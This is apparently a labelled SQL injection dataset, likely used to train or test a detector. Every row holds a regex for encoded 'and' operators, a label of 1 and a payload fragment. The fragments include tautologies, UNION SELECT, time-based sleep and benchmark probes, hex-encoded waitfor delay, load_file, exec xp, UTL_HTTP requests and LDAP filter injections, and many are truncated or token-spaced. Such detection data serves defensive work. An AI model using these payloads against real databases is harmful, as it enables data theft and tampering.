(\%20and|\+and|&&|\&\&)										1		 1;  (  load_file  (  char  (  47
(\%20and|\+and|&&|\&\&)										1		 distinct
(\%20and|\+and|&&|\&\&)										1		 insert
(\%20and|\+and|&&|\&\&)										1		 or 1  =  1/*
(\%20and|\+and|&&|\&\&)										1		 1;  (  load_file  (  char  (  47
(\%20and|\+and|&&|\&\&)										1		 \x27UNION SELECT
(\%20and|\+and|&&|\&\&)										1		 PRINT
(\%20and|\+and|&&|\&\&)										1		 char%4039%41%2b%40SELECT
(\%20and|\+and|&&|\&\&)										1		 or 0  =  0 #"
(\%20and|\+and|&&|\&\&)										1		 $  (  sleep 50  ) 
(\%20and|\+and|&&|\&\&)										1		 s
(\%20and|\+and|&&|\&\&)										1		 truncate
(\%20and|\+and|&&|\&\&)										1		 as
(\%20and|\+and|&&|\&\&)										1		 like
(\%20and|\+and|&&|\&\&)										1		 or username like char  (  37  )  
(\%20and|\+and|&&|\&\&)										1		 or 3  =  3
(\%20and|\+and|&&|\&\&)										1		 exec sp
(\%20and|\+and|&&|\&\&)										1		 or 0  =  0 #
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 procedure
(\%20and|\+and|&&|\&\&)										1		 "-"
(\%20and|\+and|&&|\&\&)										1		 ||UTL_HTTP.REQUEST
(\%20and|\+and|&&|\&\&)										1		 &apos
(\%20and|\+and|&&|\&\&)										1		 sqlvuln
(\%20and|\+and|&&|\&\&)										1		 @variable
(\%20and|\+and|&&|\&\&)										1		 or x  =  x
(\%20and|\+and|&&|\&\&)										1		 or a  =  a
(\%20and|\+and|&&|\&\&)										1		 delete
(\%20and|\+and|&&|\&\&)										1		 UNION ALL SELECT
(\%20and|\+and|&&|\&\&)										1		 or 2 > 1
(\%20and|\+and|&&|\&\&)										1		 uni/**/on sel/**/ect
(\%20and|\+and|&&|\&\&)										1		  )    )   
(\%20and|\+and|&&|\&\&)										1		 bfilename
(\%20and|\+and|&&|\&\&)										1		 UEf
(\%20and|\+and|&&|\&\&)										1		 or sleep  (  __TIME__  )  #
(\%20and|\+and|&&|\&\&)										1		 ||6
(\%20and|\+and|&&|\&\&)										1		 or 1/*
(\%20and|\+and|&&|\&\&)										1		 ?
(\%20and|\+and|&&|\&\&)										1		 or 1  =  1
(\%20and|\+and|&&|\&\&)										1		  
(\%20and|\+and|&&|\&\&)										1		 exec  (  @s  ) 
(\%20and|\+and|&&|\&\&)										1		 update
(\%20and|\+and|&&|\&\&)										1		 or   (  EXISTS  ) 
(\%20and|\+and|&&|\&\&)										1		 UNION SELECT
(\%20and|\+and|&&|\&\&)										1		 asc
(\%20and|\+and|&&|\&\&)										1		 /
(\%20and|\+and|&&|\&\&)										1		 admin"/*
(\%20and|\+and|&&|\&\&)										1		  )  
(\%20and|\+and|&&|\&\&)										1		 declare @q nvarchar   (  200  )   0x730065006c00650063 ...
(\%20and|\+and|&&|\&\&)										1		  UNION SELECT
(\%20and|\+and|&&|\&\&)										1		 desc
(\%20and|\+and|&&|\&\&)										1		 0x770061006900740066006F0072002000640065006C00 ...
(\%20and|\+and|&&|\&\&)										1		 or isNULL  (  1/0  )   /*
(\%20and|\+and|&&|\&\&)										1		  ( 
(\%20and|\+and|&&|\&\&)										1		 !
(\%20and|\+and|&&|\&\&)										1		 sqlvuln
(\%20and|\+and|&&|\&\&)										1		 0x730065006c0065006300740020004000400076006500 ...
(\%20and|\+and|&&|\&\&)										1		 #NAME?
(\%20and|\+and|&&|\&\&)										1		 or a   =   a
(\%20and|\+and|&&|\&\&)										1		 admin" #
(\%20and|\+and|&&|\&\&)										1		 PRINT @@variable
(\%20and|\+and|&&|\&\&)										1		 %2A%28%7C%28mail%3D%2A%29%29
(\%20and|\+and|&&|\&\&)										1		 union select
(\%20and|\+and|&&|\&\&)										1		 ||  (  elt  (  -3+5
(\%20and|\+and|&&|\&\&)										1		  (  sqlattempt2  ) 
(\%20and|\+and|&&|\&\&)										1		 "&"
(\%20and|\+and|&&|\&\&)												 s
(\%20and|\+and|&&|\&\&)										1		  UNION ALL SELECT
(\%20and|\+and|&&|\&\&)										1		  union select
(\%20and|\+and|&&|\&\&)										1		 or
(\%20and|\+and|&&|\&\&)										1		 select
(\%20and|\+and|&&|\&\&)										1		 or 1  =  1 /*
(\%20and|\+and|&&|\&\&)										1		 benchmark  (  10000000
(\%20and|\+and|&&|\&\&)										1		 exec xp
(\%20and|\+and|&&|\&\&)										1		 sqlattempt1
(\%20and|\+and|&&|\&\&)												 @variable
(\%20and|\+and|&&|\&\&)										1		 %2A%7C
(\%20and|\+and|&&|\&\&)										1		 *  (  |  (  mail  =  *   )    ) 
(\%20and|\+and|&&|\&\&)										1		 order by
(\%20and|\+and|&&|\&\&)										1		 //*
(\%20and|\+and|&&|\&\&)										1		 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
(\%20and|\+and|&&|\&\&)										1		  (  sqlvuln  ) 
(\%20and|\+and|&&|\&\&)										1		 having
(\%20and|\+and|&&|\&\&)										1		 "*"
(\%20and|\+and|&&|\&\&)										1		 replace
(\%20and|\+and|&&|\&\&)										1		 "^"
(\%20and|\+and|&&|\&\&)										1		 *  (  |  (  objectclass  =  *   )    ) 
(\%20and|\+and|&&|\&\&)										1		 limit
(\%20and|\+and|&&|\&\&)										1		 or 1  =  1#
(\%20and|\+and|&&|\&\&)										1		 *|
(\%20and|\+and|&&|\&\&)										1		 .s
(\%20and|\+and|&&|\&\&)										1		 |
(\%20and|\+and|&&|\&\&)										1		 #NAME?
(\%20and|\+and|&&|\&\&)										1		   )  
(\%20and|\+and|&&|\&\&)										1		 # from wapiti
(\%20and|\+and|&&|\&\&)										1		 sleep  (  __TIME__  )  #
(\%20and|\+and|&&|\&\&)										1		    )    )   
(\%20and|\+and|&&|\&\&)										1		 1  )   as boed where 6787  =  6787
(\%20and|\+and|&&|\&\&)										1		 1" where 4281  =  4281
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ztkr where 1532  =  1532
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		  (  1589  =  1589  )  *1
(\%20and|\+and|&&|\&\&)										1		 1" where 6501  =  6501
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  7889  =  5114
(\%20and|\+and|&&|\&\&)										1		 1   )    )     )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 6897  =  6897
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as osuh where 8809  =  8809
(\%20and|\+and|&&|\&\&)										1		 1  )   as gbtj where 8175  =  8175
(\%20and|\+and|&&|\&\&)										1		 1  )   as lisg where 5490  =  5490
(\%20and|\+and|&&|\&\&)										1		 1   )    )    procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as muyz where 6105  =  6105
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1402  =  1402
(\%20and|\+and|&&|\&\&)										1		 1 where 9872  =  9872
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 5774  =  5774
(\%20and|\+and|&&|\&\&)										1		 iif  (  3204  =  8489
(\%20and|\+and|&&|\&\&)										1		 1" where 6800  =  6800 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as bbkl where 5686  =  5686
(\%20and|\+and|&&|\&\&)										1		 1  )   as bhdj where 4472  =  4472
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as mvxa where 3024  =  3024
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1" where 8727  =  8727
(\%20and|\+and|&&|\&\&)										1		 1  )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as rpxd where 4929  =  4929
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as mlpf where 7425  =  7425
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1" where 7045  =  7045
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9861  =  9861
(\%20and|\+and|&&|\&\&)										1		 1 where 3354  =  3354
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2232  =  2232
(\%20and|\+and|&&|\&\&)										1		 iif  (  2452  =  8999
(\%20and|\+and|&&|\&\&)										1		 1  )   as oknr where 3228  =  3228
(\%20and|\+and|&&|\&\&)										1		 1  )   as mtda where 3951  =  3951
(\%20and|\+and|&&|\&\&)										1		 iif  (  9190  =  5059
(\%20and|\+and|&&|\&\&)										1		 1  )   where 7026  =  7026
(\%20and|\+and|&&|\&\&)										1		 1  )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 elt  (  5953  =  5953
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as brwj where 9180  =  9180
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as ufba where 4049  =  4049
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9447  =  9447
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as ljhz where 2416  =  2416
(\%20and|\+and|&&|\&\&)										1		 1 where 4641  =  4641
(\%20and|\+and|&&|\&\&)										1		 1 where 6223  =  6223 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1001  =  1001 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as tgwp where 9405  =  9405
(\%20and|\+and|&&|\&\&)										1		 1  )   as msat where 1267  =  1267
(\%20and|\+and|&&|\&\&)										1		 1 where 8506  =  8506
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1 where 1299  =  1299
(\%20and|\+and|&&|\&\&)										1		 begin dbms_lock.sleep  (  5  ) 
(\%20and|\+and|&&|\&\&)										1		 iif  (  1157  =  4542
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xmac where 7692  =  7692
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as xxdm where 4818  =  4818
(\%20and|\+and|&&|\&\&)										1		 end if
(\%20and|\+and|&&|\&\&)										1		  (  case when 2646  =  8520 then 2646 else null end  ) 
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as quap where 7625  =  7625
(\%20and|\+and|&&|\&\&)										1		  (  2329  =  4209  )  *1
(\%20and|\+and|&&|\&\&)										1		 1 where 4844  =  4844
(\%20and|\+and|&&|\&\&)										1		 1" where 3764  =  3764
(\%20and|\+and|&&|\&\&)										1		 1" where 8016  =  8016
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as wsyv where 8142  =  8142 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1" where 9230  =  9230
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as krro where 1050  =  1050 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as fjtv where 8904  =  8904
(\%20and|\+and|&&|\&\&)										1		 1"  )   as qnmd where 5642  =  5642
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1793  =  1793
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		   (  convert  (  int
(\%20and|\+and|&&|\&\&)										1		 1 where 2060  =  2060
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )    rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1" where 1166  =  1166
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2543  =  2543
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 iif  (  3760  =  4785
(\%20and|\+and|&&|\&\&)										1		 1  )   where 5442  =  5442
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as gxvp where 3865  =  3865
(\%20and|\+and|&&|\&\&)										1		 iif  (  5462  =  8866
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1  )   as kaew where 2658  =  2658
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 6311  =  6311
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as gygm where 4024  =  4024
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as kndn where 9314  =  9314
(\%20and|\+and|&&|\&\&)										1		 1"   )    )   
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6494  =  6494
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 8375  =  8375
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 2452  =  2452
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 iif  (  1539  =  1539
(\%20and|\+and|&&|\&\&)										1		 1"  )   as jiiq where 6847  =  6847
(\%20and|\+and|&&|\&\&)										1		 1"  )   as zopq where 2680  =  2680
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as nlzg where 1482  =  1482 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 make_set  (  7729  =  7729
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as sgln where 7573  =  7573
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as puws where 7006  =  7006
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2390  =  2390
(\%20and|\+and|&&|\&\&)										1		 1"  )   as giqb where 4664  =  4664
(\%20and|\+and|&&|\&\&)										1		  (  case when 6398  =  6398 then 1 else null end  ) 
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1"  )   as wxea where 6394  =  6394 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as chal where 6661  =  6661
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as esks where 1138  =  1138
(\%20and|\+and|&&|\&\&)										1		 1"  )   as mibc where 3113  =  3113
(\%20and|\+and|&&|\&\&)										1		 1  )   where 7159  =  7159
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4710  =  4710 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1" where 1234  =  1234
(\%20and|\+and|&&|\&\&)										1		 1"  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 8734  =  8734
(\%20and|\+and|&&|\&\&)										1		 1"  )   as tuem where 1328  =  1328
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as nwnp where 6140  =  6140
(\%20and|\+and|&&|\&\&)										1		 iif  (  8214  =  4954
(\%20and|\+and|&&|\&\&)										1		 1" where 9889  =  9889
(\%20and|\+and|&&|\&\&)										1		 1 where 8393  =  8393
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as ehlg where 6340  =  6340
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as itxo where 7916  =  7916
(\%20and|\+and|&&|\&\&)										1		 1  )   as hvsk where 7902  =  7902
(\%20and|\+and|&&|\&\&)										1		 1"  )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1 where 2382  =  2382
(\%20and|\+and|&&|\&\&)										1		 1 where 9404  =  9404
(\%20and|\+and|&&|\&\&)										1		 1  )   as nsdy where 7513  =  7513
(\%20and|\+and|&&|\&\&)										1		 iif  (  8354  =  3515
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as rcnk where 1800  =  1800
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as usnn where 3201  =  3201
(\%20and|\+and|&&|\&\&)										1		 1 where 8398  =  8398
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 3679  =  3679
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 3826  =  3826
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9499  =  9499
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as somz where 1598  =  1598
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4964  =  4964
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as trin where 8843  =  8843
(\%20and|\+and|&&|\&\&)										1		 1  )   as hhly where 2906  =  2906
(\%20and|\+and|&&|\&\&)										1		 1  )   as vqbf where 4020  =  4020
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as sdnd where 9472  =  9472
(\%20and|\+and|&&|\&\&)										1		 iif  (  3447  =  1084
(\%20and|\+and|&&|\&\&)										1		 1  )   as tbve where 4828  =  4828
(\%20and|\+and|&&|\&\&)										1		 1  )   as hggi where 6511  =  6511
(\%20and|\+and|&&|\&\&)										1		 1 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1607  =  1607
(\%20and|\+and|&&|\&\&)										1		 1" where 8333  =  8333
(\%20and|\+and|&&|\&\&)										1		 1" where 9341  =  9341
(\%20and|\+and|&&|\&\&)										1		 1   )    )     )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1 where 6881  =  6881 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 begin if   (  5624  =  5624  )   then dbms_lock.sleep  (  5  ) 
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4573  =  4573
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 7729  =  7729
(\%20and|\+and|&&|\&\&)										1		 1  )   as qkkm where 8461  =  8461
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 3507  =  3507
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as dksq where 7161  =  7161
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1%" procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1%"
(\%20and|\+and|&&|\&\&)										1		 1"  )   as lvbm where 8179  =  8179
(\%20and|\+and|&&|\&\&)										1		 1 where 6827  =  6827
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as ynuw where 9138  =  9138
(\%20and|\+and|&&|\&\&)										1		 1" where 3510  =  3510
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as izvy where 2569  =  2569
(\%20and|\+and|&&|\&\&)										1		 1  ) 
(\%20and|\+and|&&|\&\&)										1		 make_set  (  2672  =  2672
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1  )   as odqn where 3910  =  3910
(\%20and|\+and|&&|\&\&)										1		 1" rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1" where 7796  =  7796
(\%20and|\+and|&&|\&\&)										1		 1  )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as bjxd where 4299  =  4299
(\%20and|\+and|&&|\&\&)										1		 1 where 8095  =  8095
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8196  =  8196
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2010  =  2010
(\%20and|\+and|&&|\&\&)										1		 1 where 1015  =  1015
(\%20and|\+and|&&|\&\&)										1		 1%"  )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 9774  =  9774
(\%20and|\+and|&&|\&\&)										1		 1  )   as ilqx where 8547  =  8547
(\%20and|\+and|&&|\&\&)										1		 1" where 8089  =  8089
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9827  =  9827
(\%20and|\+and|&&|\&\&)										1		 1  )   as hlit where 4973  =  4973 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 iif  (  4638  =  8258
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as riui where 2605  =  2605
(\%20and|\+and|&&|\&\&)										1		 1%"  )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as azak where 4911  =  4911
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ymto where 3453  =  3453
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as sqow where 8752  =  8752
(\%20and|\+and|&&|\&\&)										1		 1"  )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"  )   as frmp where 6073  =  6073
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 7096  =  7096
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1 where 4787  =  4787
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as cwyb where 3633  =  3633
(\%20and|\+and|&&|\&\&)										1		 iif  (  5214  =  7412
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1" where 9725  =  9725
(\%20and|\+and|&&|\&\&)										1		 1"  )   as pobe where 1704  =  1704
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  2869  =  9448
(\%20and|\+and|&&|\&\&)										1		 1"   )    )     )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xyuy where 6894  =  6894
(\%20and|\+and|&&|\&\&)										1		 1"  )   as wmng where 5976  =  5976
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as cduw where 4495  =  4495
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as zoso where 3633  =  3633
(\%20and|\+and|&&|\&\&)										1		 1" rlike sleep  (  5  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 5065  =  5065
(\%20and|\+and|&&|\&\&)										1		 1  )   as tykp where 6851  =  6851
(\%20and|\+and|&&|\&\&)										1		 1  )   as fhvb where 4008  =  4008
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as vqdh where 1603  =  1603
(\%20and|\+and|&&|\&\&)										1		 1" where 5250  =  5250
(\%20and|\+and|&&|\&\&)										1		 1  )   where 8094  =  8094
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as vryv where 5600  =  5600
(\%20and|\+and|&&|\&\&)										1		 1"
(\%20and|\+and|&&|\&\&)										1		 1   )    )     )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 iif  (  7953  =  3021
(\%20and|\+and|&&|\&\&)										1		 1" where 7005  =  7005
(\%20and|\+and|&&|\&\&)										1		 1  )   as fnpq where 5209  =  5209
(\%20and|\+and|&&|\&\&)										1		 1 where 8889  =  8889
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )    procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1 where 5080  =  5080
(\%20and|\+and|&&|\&\&)										1		 1  )   where 3381  =  3381
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 3390  =  3390
(\%20and|\+and|&&|\&\&)										1		 iif  (  2084  =  5671
(\%20and|\+and|&&|\&\&)										1		 end# ckxq
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as vtad where 3653  =  3653 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1096  =  1096
(\%20and|\+and|&&|\&\&)										1		 1" where 2483  =  2483
(\%20and|\+and|&&|\&\&)										1		 iif  (  1878  =  2513
(\%20and|\+and|&&|\&\&)										1		 1 where 1092  =  1092
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as svhd where 9761  =  9761
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1833  =  1833
(\%20and|\+and|&&|\&\&)										1		 iif  (  4436  =  8910
(\%20and|\+and|&&|\&\&)										1		 1" where 2886  =  2886
(\%20and|\+and|&&|\&\&)										1		 1  )   where 8734  =  8734 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8612  =  8612
(\%20and|\+and|&&|\&\&)										1		 1" where 6023  =  6023
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as uadn where 9588  =  9588 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1  )   as wiyx where 6515  =  6515
(\%20and|\+and|&&|\&\&)										1		 1" where 4672  =  4672
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6035  =  6035
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  9627
